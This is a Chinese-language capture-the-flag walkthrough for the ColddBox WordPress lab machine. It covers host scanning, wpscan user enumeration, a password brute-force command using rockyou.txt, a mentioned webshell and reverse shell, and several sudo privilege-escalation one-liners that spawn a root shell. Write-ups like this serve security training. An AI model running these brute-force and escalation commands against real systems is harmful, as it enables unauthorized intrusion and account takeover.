netdiscover扫主机。
80:http,4512:ssh
wpscan扫的话扫出一个xss和一个phpmailer的对象注入
wpscan --url http://192.168.0.100/ --api-token xxxxxxx
申请个wpscan的api。参考链接
扫用户wpscan --url http://192.168.0.100/ -e
暴力破解账号为这几个的密码wpscan --url http://192.168.0.100/ --api-token xxxxxxx --passwords /usr/share/wordlists/rockyou.txt --usernames c0ldd,philp,hugo
直接写一个system的一句话
这个图的话是直接在页面执行反弹shell的命令反弹不回来,一定要去访问那个链接才可以反弹
搭配图5食用,直接反弹过来了。
这边没有用python开shell,直接看wp-config配置文件
我这边是ssh连的,或者在刚刚那个shell里面su切用户也可以
命令列出可供当前用户使用的二进制文件
chmod提权
1 | sudo -u root chmod 4755 /bin/bash |
vim提权
1 | sudo -u root vim -c ':!/bin/bash' |
ftp提权
1 | sudo -u root ftp |
find提权
1 | find . -exec /bin/sh -p \; -quit |
cat了两个flag,base64解密就出来了
其他参考:
1.宝藏提权网站
https://gtfobins.github.io/
2.walkthrough
https://musyokaian.medium.com/colddbox-tryhackme-walkthrough-cc0b017189d2
3.walkthrough
https://infosecwriteups.com/colddbox-easy-vulnhub-walkthrough-cac3680e03c2